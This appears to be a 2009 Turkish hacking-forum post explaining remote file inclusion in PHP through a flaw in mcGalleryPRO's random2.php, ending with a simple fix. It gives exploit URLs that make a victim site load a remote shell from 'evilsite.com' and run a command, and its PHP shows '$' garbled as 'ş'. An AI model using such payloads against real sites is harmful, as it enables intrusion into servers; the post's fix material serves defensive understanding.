By.BiCi Admin
Rep Gücü : 401 Rep Puanı : 10
| Konu: [# RFI Açığı Arama ] Bırakın Hazır Açıkları, Açığı Kendiniz Yaratın ! Salı Mart 17, 2009 9:58 pm | |
| [# RFI Açığı Arama ]
Hacker’ların RFI açığı ararken dikkat ettikleri başlıca parametreleri şöyle sıralayabiliriz;
- İnclude
- Require
- Define
Bu yönergelerin kullanımı sırasında "ş" tanım işareti ile kullanılan parametreler yardımıyla uzaktan kod çağırılabiliyor.
Örnek olarak aşağıdaki kodu ele alalım: Kod: include ("şpath_to_folder/admin/common.php" ); include ("şpath_to_folder/lang/şlang_def" );
ukarıdaki kodlar mcGalleryPRO scriptinden alınmıştır.kurulum paketindeki random2.php dosyasındaki hatalı kodlamadan dolayı uzaktan dosya çağırmak mümkündür.şimdi burda başında ş işareti olan parametrelere dikkatinizi çekmek istiyorum.
path_to_folder ve lang_def... ilk parametreyi kullanarak rfi yapılabilmektedir.nedeni bu değişkenin daha önce sabit bir değere eşitlenmemiş olmasıdır.dolayısıyla bu değişkene atıyacağınız her hangi bir değer onun değerini belirler.
bu kodla örnek rfi yi oluşturalım :
http://www.victimsite.com/mcGalleryPRO_dir/random2.php?path_to_folder=http://evilsite.com/shell.txt?cmd=id
Bu şekilde bir Rfi’nin varsayılan ayarlarda bir değişiklik yapılmamışsa çalışması beklenir.
Peki aynı şey lang_def için mümkün müdür? Tabii ki hayır... Çünkü dikkatinizi çektiyse lang_def değişkeninden önce sırada /lang klasörü vardır.Eğer siz;
http://www.victimsite.com/mcGalleryPRO_dir/random2.php?lang_def=http://evilsite.com/shell.txt?cmd=id
...şeklinde bir rfi yapmak isterseniz;bu kodu çağırdığınızda gezgininiz /lang klasörün altında çağıracağınız kodu arar.şimdi ilk değişkenimize geri dönelim..
gördüğünüz gibi bu bir açık yani "bug" dır.peki kapatılması mümkün mü?Elbette..
örnek olarak bir fixing yapalım:
Kod:
şpath_to_folder = "./" ;
Kod:
include ("şpath_to_folder/admin/common.php" );
include ("şpath_to_folder/lang/şlang_def" );
Basit olarak random2.php dosyasının böyle kodlandığını varsayarsak rfi yapamayacağımızı görürüz.çünkü path_to_folder değişkenine bir değer atanmış ve çağırılmak istenen dosyanın ./ yani public_html ya da httpdocs gibi sitenin root klasöründe aranması işaret edilmiştir.
__________________
Zaferdir Ancak Bize Yakışan
Meydan Boş ..
Yerimi Dolduracak Kişiye Başarılar ..
| | |
| |
|